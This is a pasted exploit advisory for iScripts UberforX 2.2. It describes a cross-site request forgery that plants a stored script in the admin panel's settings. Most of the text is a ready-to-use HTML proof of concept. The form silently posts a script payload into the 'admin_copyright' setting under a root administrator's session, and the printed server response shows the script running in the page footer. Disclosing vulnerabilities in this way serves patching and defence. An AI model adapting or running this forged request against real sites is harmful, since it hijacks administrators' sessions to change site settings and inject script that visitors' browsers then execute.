Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit title: iScripts UberforX 2.2 - CSRF & Stored XSS in Admin Panel
- # Date: 16/04/2018
- # Exploit Author: ManhNho
- # Vendor Homepage: https://www.iscripts.com
- # Software Link: https://www.iscripts.com/uberforx/
- # Demo Link: https://www.demo.iscripts.com/uberforx/demo/cms
- # Version: 2.2
- # CVE: Pending...
- # Tested on: Windows 10 / Kali Linux
- # Category: Webapps
- #1. Description
- -----------------------------------------------------
- iScripts UberforX 2.2 - CSRF & Stored XSS via "manage_settings" section in Admin Panel.
- #2. PoC
- -----------------------------------------------------
- a) Send below crafted request to logged in user who is having Root Administrator level access
- <html>
- <!-- CSRF PoC - ManhNho -->
- <body>
- <script>history.pushState('', '', '/')</script>
- <form action="https://www.demo.iscripts.com/uberforx/demo/cms?section=manage_settings&action=edit&id=2" method="POST">
- <input type="hidden" name="id" value="2" />
- <input type="hidden" name="cms_set_name" value="admin_copyright" />
- <input type="hidden" name="cms_set_value" value="<script>alert('1')</script>" />
- <input type="hidden" name="submit" value="Save" />
- <input type="submit" value="Submit request" />
- </form>
- </body>
- </html>
- b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
- Website will popup alert '1'
- Response:
- HTTP/1.1 200 OK
- Date: Mon, 16 Apr 2018 07:44:55 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Connection: close
- Content-Type: text/html
- Content-Length: 28359
- ...
- </div>
- <div class="footer row-fluid">
- <p class="muted"><small><script>alert('1')</script></small></p>
- </div>
- ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement